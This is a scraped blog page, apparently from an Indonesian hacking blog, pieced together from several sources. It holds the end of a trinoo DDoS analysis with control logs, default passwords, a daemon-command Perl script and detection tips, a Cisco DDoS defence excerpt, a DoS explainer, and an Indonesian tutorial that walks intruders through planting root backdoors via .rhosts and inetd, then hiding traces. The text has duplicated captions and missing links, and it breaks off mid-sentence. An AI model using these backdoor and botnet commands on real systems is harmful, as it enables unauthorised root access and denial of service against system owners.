72 73 7a 20 33 32 30 30 30 rsz 32000
  1. T -> [AP]
74 72 69 6e 6f 6f 3e 20 trinoo>
  1. ##
T -> [AP] 64 6f 73 20 32 31 36 2e 31 36 30 2e 58 58 2e 59 dos 216.160.XX.Y 59 0d 0a Y..
  1. T -> [AP]
44 6f 53 3a 20 50 61 63 6b 65 74 69 6e 67 20 32 DoS: Packeting 2 31 36 2e 31 36 30 2e 58 58 2e 59 59 2e 0a 16.160.XX.YY..
  1. U ->
61 61 61 20 6c 34 34 61 64 73 6c 20 32 31 36 2e aaa l44adsl 216. 31 36 30 2e 58 58 2e 59 59 160.XX.YY
  1. T -> [AP]
74 72 69 6e 6f 6f 3e 20 trinoo>
  1. #
T -> [AP] 71 75 69 74 0d 0a quit..
  1. T -> [AP]
62 79 65 20 62 79 65 2e 0a bye bye..
  1. ##
T -> [AP] 62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a betaalmostdone..
  1. #
T -> [AP] 74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66 trinoo v1.07d2+f 33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53 3+c..[rpm8d/cb4S 78 2f 5d 0a 0a 0a x/]...
  1. ##
T -> [AP] 74 72 69 6e 6f 6f 3e 20 trinoo>
  1. ##
T -> [AP] 6d 70 69 6e 67 0d 0a mping..
  1. #
T -> [AP] 6d 70 69 6e 67 3a 20 53 65 6e 64 69 6e 67 20 61 mping: Sending a 20 50 49 4e 47 20 74 6f 20 65 76 65 72 79 20 42 PING to every B 63 61 73 74 73 2e 0a casts..
  1. U ->
70 6e 67 20 6c 34 34 61 64 73 6c png l44adsl
  1. #
U -> 50 4f 4e 47 PONG
  1. #
T -> [AP] 74 72 69 6e 6f 6f 3e 20 50 4f 4e 47 20 31 20 52 trinoo> PONG 1 R 65 63 65 69 76 65 64 20 66 72 6f 6d 20 31 39 32 eceived from 192 2e 31 36 38 2e 30 2e 31 0a .168.0.1
  1. #
T -> [AP] 71 75 69 74 0d 0a quit..
  1. T -> [AP]
62 79 65 20 62 79 65 2e 0a bye bye.. ------------------------------------------------------------------------------ Appendix B - trinot script -------------------------- ------------------------------- cut here -----------------------------------
  1. !/usr/bin/perl -w
  2. # trinot v. 1.1
  3. By Dave Dittrich <>
  4. # Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
  5. to all their masters, exit, etc. Using this program (and knowledge
  6. of the proper daemon password), you can affect trinoo daemons
  7. externally and monitor packets to verify if the daemons are up,
  8. expose their masters, or shut them down.
  9. # Needs Net::RawIP (
  10. Requires libpcap (
  11. # Example: ./trinot host1 [host2 [...]]
  12. ./trinot -S host
  13. ./trinot -p password -P host
  14. # (This code was hacked from the "macof" program, written by
  15. Ian Vitek <>)
require ''; use Net::RawIP; $a = new Net::RawIP({udp => {}}); chop($hostname = `hostname`); Getopts('PSDp:f:s:d:l:i:vh'); die "usage: $0 [options] host1 [host2 [...]]\ \t-P\t\t\tSend \"png\" command\ \t-S\t\t\tSend \"shi\" command\ \t-D\t\t\tSend \"d1e\" command (default)\ \t-p password\t\t(default:\"l44adsl\") \t-f from_host\t\t(default:$hostname)\ \t-s src_port\t\t(default:random)\ \t-d dest_port\t\t(default:27444)\ \t-l ipfile\t\tSend to IP addresses in ipfile\ \t-i interface \t\tSet sending interface (default:eth0)\ \t-v\t\t\tVerbose\ \t-h This help\n" unless ( !$opt_h );
  1. set default values
$opt_i = ($opt_i) ? $opt_i : "eth0"; $s_port = ($opt_s) ? $opt_s : int rand 65535; $d_port = ($opt_d) ? $opt_d : 27444; $pass = ($opt_p) ? $opt_p : "l44adsl";
  1. choose network card
if($opt_e) { $a->ethnew($opt_i, dest => $opt_e); } else { $a->ethnew($opt_i); } $cmd = ($opt_P) ? "png $pass" : ($opt_S) ? "shi $pass" : ($opt_D) ? "d1e $pass" : "d1e $pass"; $s_host = ($opt_f) ? $opt_f : $hostname; if ($opt_l) { open(I,"<$opt_l") || die "could not open file: '$opt_l'"; while (<I>) { chop; push(@ARGV,$_); } close(I); } foreach $d_host (@ARGV) { $a->set({ip => {saddr => $s_host, daddr => $d_host}, udp => {source => $s_port, dest => $d_port, data => $cmd} }); print "sending '$cmd' to $d_host\n" if $opt_v; $a->send; } exit(0); ------------------------------- cut here ----------------------------------- Appendix C - References ----------------------- TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright., Addison-Wesley. lsof: tcpdump: hunt: sniffit: ngrep: loki client/server: Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ] Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 06 of 17 [ L O K I 2 (the implementation) ] LibNet: Net::RawIP: crack: Password cracking utilities: targa.c: Appendix D - Abbreviated report of actual trinoo attack. ------------------------------------------------------ The following is an abbreviated version the initial report sent out by Susan Levy Haskell of the University of Minnesota. This report, which only concerns a small time span in the three day attack, showed 227 unique attacking systems, 114 of which were at Internet 2 sites. (The actual list of attacking systems, all of which are also root compromised victims in their own right, have been removed. A complete report of all unique attacking IP addresses over the three day period is not available.) Just to show what a large trinoo network could do, consider that a file (named "owned.log") containing 888 IP addresses was found same location as the trinoo source code analyzed here (which is assumed to be the same code as that used for the attack). Another file in that directory (named "216") contains addresses of 10549 systems on netblocks, and is assumed to be a list of potential targets for compromise and trinoo daemon/master installation. Rumors on Usenet newsgroups and Slashdot put the number of systems controlled by this group in the 3000+ range. ---------------------------------------------------------------------------- Hello: This is a notification that a system at your site apparently was used in a large-scale UDP flood on a system at the University of Minnesota. The hosts below have been involved in a series of escalating large-scale denials-of-service that are flooding the University of Minnesota off the internet. They are periodic, but expanding in the number of hosts used to attack. We would like to hear about it if you can confirm whether your system(s) were used. We're also *very* interested in any information about this tool (since it appears to be new, and quite effective). Thus far, all hosts used in this attack appear to have been Solaris 2.x systems that were compromised using the recently-announced rpc.cmsd exploits (see for details). The following are lists of hosts apparently used, and the period of use. We're certain about the timestamps--they're in CDT (-500)--but as with all such floods, they ramp up and tail off. Since we're getting data in ten-minute slices, the times are approximate. The floods use unforged source IPs and consistent UDP source-ports. The destination ports are random, aimed at The packets are 32-byte UDP (and each flow represents many packets). I've included profile information below, rather than log excerpts, because these run to many GB. If you would like Cisco net-flow excerpts to demostrate the behavior, please reply to this message & ask. All attacks have been launched at ( And, as I mentioned, all times are in CDT (-500) from an ntp-slaved log host (for the ten-minute segments). Thank you. -susan -- Susan B. Levy Haskell / / voice: (612) 626-8639 Security Incident Response Coordinator fax: (612) 626-1002 Networking and Telecommunications Services, University of Minnesota
  • ** To report a security incident in progress, call (612) 625-0006 ***
================================================= Appendix E - Further methods of detecting trinoo ------------------------------------------------ Authors: David Brumley <> David Dittrich <> George Weaver <> Detecting Trinoo Currently Trinoo has several signatures that allow it to be detected from IP flow records. Trinoo Daemon (ns.c) - 1. The trinoo daemon by default listens to UDP port 27444 2. All communication with the trinoo daemon must have the string l44 (ell 44). 3. The SYN flood mechanism picks the destination port via the following algorithm: to.syn_port = htons(rand() % 65534) Several observations can be made: a. randomize()/srandom() is never called, so the destination port will always fit the following algorithm: SYN packet 1 has destination port x SYN packet 2 has destination port y as defined by srandom(x); y = rand(); SYN packet 3 has destination port z as defined by srandom(y); z = rand(); b. Since the port is a result of modulus 65534, destination port 0 will show up, while destination port 65535 will not. IDS detection of daemon: 1. Look for UDP connections to destination port 27444. This is indicative of the control session. 2. The string l44 will determine with a large probability that the packet is part of a trinoo control session. 3. Running trinoo DoS attacks (SYN Floods) can be identified by the algorithm given in 3 above. In addition, if you can catch the first SYN, it will *always* be the result of srand(1); rand();. On one authors laptop, an example sequence of destination ports would be: 32540 48264 58208 56084 46021 37263 6890 38941 17766 40714 Although this doesn't stop the Denial of Service, it will say with some probability this is a trinoo attack, and you should start looking for a master! Detecting the trinoo daemon on your network: 1. Trinoo daemons can be indexed by a master by sending a png command. Live daemons will respond with a PONG. The original author probably added this so the master can see which daemons are still alive. You can scan a network with the attached program for anything that responds appropriately (which chances are is a trinoo daemon). Trinoo Server (master.c) - The network communications that are indicative of a trinoo server are: 1. Sending UDP packets with destination port 27444 2. UDP packets as described above with the string l44adsl (ell 44 a d s ell) 3. A server will bind to port 27665 IDS detecting the trinoo server: 1. Look for flows with protocol type 17 (UDP) 2. TCP connections (protocol type 6) to destination port 27665 (the trinoo server) Detecting the Trinoo server of your network: 1. The server password hasn't changed (to the best of the authors knowledge), nor has the port it listens to. Trinoo possible masters can be detected by using a tool like nmap to find hosts listening to port 27665, i.e. nmap -PI -sT -p 27655 -m logfile "you.subnet.*.*" After a list of possible servers has been compiled, automated login can be used for positive identification. If you wish to script the automated login, try netcat (nc on most systems), i.e. echo "betaalmostdone" | nc <IP> 27665 NOTE: Your mileage may vary with the random number prediction since it's very host specific - what does rand() really return? Consult your documentation. Dikutip dari artikel cisco system.

Strategies to Protect Against Distributed Denial of Service (DDoS) Attacks

Posted in hacking on 01/04/2009 by soloteam

This white paper contains information to help you understand how DDoS attacks are orchestrated, recognize programs used to facilitate DDoS attacks, apply measures to prevent the attacks, gather forensic information if you suspect an attack, and learn more about host security.

Understanding the Basics of DDoS Attacks

Refer to the following illustration:


Behind a Client is a person that orchestrate an attack. A Handler is a compromised host with a special program running on it. Each handler is capable of controlling multiple agents. An Agent is a compromised host that is running a special program. Each agent is responsible for generating a stream of packets that is directed toward the intended victim.

Attackers have been known to use the following 4 programs to launch DDoS attacks: Trinoo, TFN, TFN2K and Stacheldraht.

In order to facilitate DDoS, the attackers need to have several hundred to several thousand compromised hosts. The hosts are usually Linux and SUN computers; however, the tools can be ported to other platforms as well. The process of compromising a host and installing the tool is automated. The process can be divided into the following steps, in which the attackers:

  1. Initiate a scan phase in which a large number of hosts (on the order of 100,000 or more) are probed for a known vulnerability.
  2. Compromise the vulnerable hosts to gain access.
  3. Install the tool on each host.
  4. Use the compromised hosts for further scanning and compromises.

Because an automated process is used, attackers can compromise and install the tool on a single host in under 5 seconds. In other words, several thousand hosts can be compromised in under an hour.

Characteristics of Common Programs Used to Facilitate Attacks

The following are common programs that hackers use to facilitate distributed denial of services attacks:

  • Trinoo

    Communication between clients, handlers and agents use the following ports:

    1524 tcp
    27665 tcp
    27444 udp
    31335 udp

    Note: The ports listed above are the default ports for this tool. Use these ports for orientation and example only, because the port numbers can easily be changed.

  • TFN

    Communication between clients, handlers and agents use ICMP ECHO and ICMP ECHO REPLY packets.

  • Stacheldraht

    Communication between clients, handlers and agents use the following ports:

    16660 tcp
    65000 tcp

    Note: The ports listed above are the default ports for this tool. Use these ports for orientation and example only, because the port numbers can easily be changed.

  • TFN2K

    Communication between clients, handlers and agents does not use any specific port (it may be supplied on run time or it will be chosen randomly by a program) but is a combination of UDP, ICMP and TCP packets.

    For a detailed analysis of DDoS programs, read the following articles.

Note: The following links point to external web sites not maintained by Cisco Systems

Serangan DoS

Posted in hacking on 01/04/2009 by soloteam

Serangan DoS (Inggris: denial-of-service attacks) adalah jenis

Serangan DoS sederhana yang menggunakan host penyerang yang lebih kuat dibandingkan dengan host target.

Serangan DoS sederhana yang menggunakan host penyerang yang lebih kuat dibandingkan dengan host target.

serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

  • Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
  • Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
  • Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Distributed Denial of Service

Distributed Denial of Service (DDoS) atau Penolakan Layanan

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

secara Terdistribusi adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang “dipaksa” menjadi zombie) untuk menyerang satu buah host target di jaringan.

Serangan Denial of Service klasik bersifat “satu lawan satu”, sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang asli, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi “tidak berguna” bagi klien.

Cara kerja serangan Distributed Denial of Service sederhana

Cara kerja serangan Distributed Denial of Service sederhana

Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang asli dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami “downtime”. Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami “downtime” selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan “Ping Flood“. Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadikan kerumitan yang sangat tinggi (bagi para administrator jaringan dan server), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1.Menjalankan tool yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diperoleh secara bebas di Internet.

2.Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga “memakan habis” semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami “downtime”.

Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah adalah:

sekilas tentang Backdoor

Posted in hacking on 01/04/2009 by soloteam

Saya akan coba membahas sedikit tentang apa itu backdoor, bagaimana backdoor itu terjadi dan bagaimana cara menanganinya, saya juga tidak bosan-bosannya meminta kritik dan saran kepada rekan-rekan jika terjadi kesalahan dalam pelaksanaan teknik ini karena saya juga baru di bidang ini apalagi saya juga masih tergolong bocah ingusan yang tidak mengetahui apa-apa. Dan saya juga mengucapkan terima kasih kepada teman-teman yang telah memberikan masukan kepada saya.

1. Eksploit

Sekarang tentunya kamu sudah asyik bermain-main dan bereksperimen dengan

shell UNIX baru yang baru kamu ‘dapatkan’. Dan mungkin sekarang kamu sudah

mulai bertanya-tanya, “apa sih eksploit (exploit, ‘sploits) itu?”. Dalam

konteks per-hacking-an, eksploit tidaklah jauh berbeda dengan artinya

dalam konteks harfiah, yaitu ‘pemanfaatan’. Tentunya eksploit-eksploit

‘hacking’ lebih spesifik lagi, yang kurang lebih bisa diartikan sebagai

‘pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar

dari penggunaan normal.’ Kelemahan-kelemahan ini bisa berupa kesalahan

pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan

lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah

eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek

dari sebuah sistem. Dalam UNIX, sering kita dengar istilah ‘mengeksploit

program anu untuk mendapat privilese root’. Tentu saja mendapatkan ‘root’

bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin

anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild

atau ftpd bisa dimanfaatkan untuk tujuan ‘header forging’, ‘ip spoofing’,

‘denial of service attack’, dan ‘mail bombing’ (hello, Anton Pardede!).

Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan

eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa

dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu

melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,

sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk

di-eksploit. Contoh – contoh dari eksploit jenis ini adalah buffer

overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana

dua proses saling berlomba untuk menyelesaikan tugas masing-masing,

biasanya proses A disuruh untuk menjalankan suatu utilitas yang

membutuhkan privilese root temporer sementara proses B dirancang untuk

mencegat proses A sebelum proses A kembali statusnya ke privilese user

biasa, mengakibatkan di-spawn-nya shell beridentitas root – sering terjadi

di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa

mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu

berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol

(lebih baik dilakukan di kotak kamu sendiri), seperti para ‘elite’

lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau

ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak

eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di

situs-situs tertentu, seperti:

atau di situs kecoak,

Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa

mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja

eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang

dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah

satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file

/etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf).

Mungkin belum terlihat fatal, namun sekalinya sang ‘cracker’ berhasil

masuk ke dalam sistem memanfaatkan login dan password dari salah seorang

user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan

akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih

gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip

yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas

sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja

yang menerima koneksi. Beberapa jenis ‘scanner’ lebih terfokus lagi,

seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan

memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file

password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.

Satu program lain yang mungkin ada gunanya adalah ‘netcat’, bisa didapat

dari Untuk menghemat waktu, banyak cracker yang

menulis skrip otomasi, jalankan skrip, tinggal berikan daftar

target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam

atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada

lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel

mengenai scanning/probing di situs-situs hacker).

Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti

eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain,

namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa

bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan

file password ke alamat email tertentu.)

2. Backdoor

Seperti terjemahan harfiahnya, backdoor bisa dianggap ‘pintu masuk lewat

belakang’. Backdoor berfungsi untuk memberikan sang programmer akses ke

suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu

saja sang programer di sini bisa juga diartikan ‘sang penyusup’.

Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga

yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar

(baik hardware maupun software ) yang sengaja menempatkan backdoor tak

terdokumentasi untuk kemudahan ‘maintenance’ dan sejenisnya, dalam artikel

ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke

dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan

menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan

berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera

menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root.

Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan

harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu

atau lebih jalan masuk ‘alternatif’. Jelas, sebagian besar teknik-teknik

backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.

Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses

root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin

menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap

selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi

dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker,

kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa

sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif

dengan privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti

Backdoor di router-router, printserver, dll buatan 3Com), namun disini

akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem

UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan

melalui file /.rhosts:

korban# echo “ ganjaman” >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar

-dalam contoh diatas user ganjaman dari – yang boleh

mengakses account tanpa password), dan untuk masuk kembali ke sistem dari

account “ganjaman” di :

ganjaman@indohack2> rlogin -l root

poof! shell root tanpa password!

Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan

entri berikut dari file /etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas

sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh

UNIX sistem secara internal. Seringkali banyak diantara crackers yang

mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet

dengan nama login “bin” tidak memerlukan password. Tapi ingatlah bahwa

file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh

sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar

kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di

home directory milik bin. Kembali ke entri file password diatas, bisa kita

lihat bahwa walaupun kita bisa me- rlogin -l bin,

namun kita masih juga tidak bisa mendapatkan shell sebab account ‘bin’

dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah

ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau

/bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren

kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa

keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah

entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau

string unik lainnya yang bukan merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan “in.rootd” (sebenernya

ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada

tuh yang namanya root daemon – tapi metode ini benar-benar cocok disebut

rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat

salah satu port yang didefinisikan dalam “inetd”:

root@korban# echo “ntcp 6969/tcp # Network Traffic Control Protocol” >>


root@korban# echo “ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r” >>


root@korban# echo “echo > ~root/.rhosts” > /tmp/crax0r

menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem

yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga

perintah diatas:

1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor

port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024

sampai 65000-an), sedangkan “Network Traffic Control Protocol” adalah

karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya

sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r

setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya

mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan

mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan

perintah-perintah selayaknya kita login lewat jalur normal. Sang shell

akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita.

Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu

lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti


3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang

baru saja kita luncurkan (id=0 – root!). Tentunya kamu bisa saja menulis

skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan

saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari

mesin host kita ke file .rhosts milik root.

Tentu jika sang admin memang keren kung funya, rlogind akan

dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu

periksa isi direktori dan file “history” milik root dan isinya menunjukkan

bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas

akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih,

kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

ganjaman@indohack2> telnet 6969

nah, sistem kamu akan tersambung ke sistem target lewat port 6969,

sedangkan daemon inet di mesin korban akan menerima sambungan tersebut,

menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan

dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik

root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali

menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang

sysadmin mungkin akan curiga melihat skrip ‘asing’ dijalankan lewat port

6969) kamu tinggal:

ganjaman@indohack2> rlogin -l root

dan, BOOM!


shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar

ke, bertitel “Terimakasih, suhu Ganjaman dan

SuperCock, atas ilmu ngent… engin badannya …” 🙂 ). Tapi ingatlah untuk

segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu

kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi

udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala

spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan

bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan

service-service yang jarang (hampir tidak pernah dipakai) seperti

utilitas-utilitas X, segala utilitas berkepala “r”, dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan

bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem

mempunyai program audit keamanan yang akan mensensus seluruh file berbit

SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi

homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu

program yang sudah berjalan / terinstal secara default, seperti xterm dan

splitvt, sehingga sebuah option rootshell akan secara otomatis

execv(“/bin/sh”, “sh”, NULL);.

Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel

kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang

